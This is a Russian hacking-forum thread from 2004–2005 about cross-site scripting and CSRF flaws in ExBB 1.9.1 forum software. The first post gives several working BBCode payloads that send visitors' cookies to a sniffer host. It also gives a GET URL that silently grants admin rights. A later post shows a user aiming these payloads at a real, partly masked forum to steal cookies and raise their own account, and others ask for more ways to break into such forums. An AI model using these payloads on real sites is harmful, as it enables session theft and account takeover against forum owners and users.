HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Xss в exbb 1.9.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.10.2004, 00:53
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
По умолчанию
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&amp;checkaction=ye s&amp;userid=3&amp;membertitle=&amp;emailaddress=l ol@lol.ru&amp;newname=lol&amp;password=&amp;homepa ge=&amp;aolname=&amp;icqnumber=&amp;location=&amp; interests=&amp;signature=&amp;numberofposts=0&amp; avatar=noavatar.gif&amp;membercode=ad&amp;submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar
 
Ответить с цитированием

  #2  
Старый 19.10.2004, 18:48
OwrLam
Познающий
Регистрация: 14.05.2004
Сообщений: 49
Провел на форуме:
26695

Репутация: 4
По умолчанию
Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - &quot;&gt;
 
Ответить с цитированием

  #3  
Старый 19.10.2004, 21:03
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
По умолчанию
ну извени!
там на столько бедная админка, что хрен там было! &nbsp;
 
Ответить с цитированием

  #4  
Старый 06.01.2005, 19:18
ViPN
Новичок
Регистрация: 06.01.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию
zFailure
Не мог бы сказать этот баг уже прикрыли?
а то отсылаю вот этот код
Код:
[size='z="]"style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'[/size]
[size='z="]"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&emailaddress=666z@list.ru&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/size]
а там тишина и пустота
Последний раз редактировалось Егорыч+++; 06.01.2005 в 19:33..
 
Ответить с цитированием

  #5  
Старый 31.01.2005, 16:28
ViPN
Новичок
Регистрация: 06.01.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
По умолчанию
кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!
 
Ответить с цитированием

  #6  
Старый 31.01.2005, 17:03
Егорыч+++
Познавший АНТИЧАТ
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию
У нас видео есть про этот форум
Последний раз редактировалось Егорыч+++; 03.02.2005 в 19:12..
 
Ответить с цитированием

  #7  
Старый 25.03.2005, 12:03
smag
Познающий
Регистрация: 24.03.2005
Сообщений: 34
Провел на форуме:
234471

Репутация: 4
По умолчанию
Цитата:
Сообщение от Егорыч+++  
У нас видео есть про этот форум
дайте пожайлуста видео!!!! чем больше тем лутше!!!
 
Ответить с цитированием

  #8  
Старый 06.02.2005, 20:14
Menvix
Познающий
Регистрация: 03.02.2005
Сообщений: 41
Провел на форуме:
508187

Репутация: 16
По умолчанию
Кликнул по ссылке
 
Ответить с цитированием

  #9  
Старый 19.02.2005, 22:11
Kihamo
Новичок
Регистрация: 14.01.2005
Сообщений: 4
Провел на форуме:
5921

Репутация: 0
По умолчанию
Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку
Код:
<a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a>
, мона зарегистрировать например такой ник
Код:
');alert(document.cookie+'
и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как
Последний раз редактировалось Kihamo; 19.02.2005 в 22:14..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.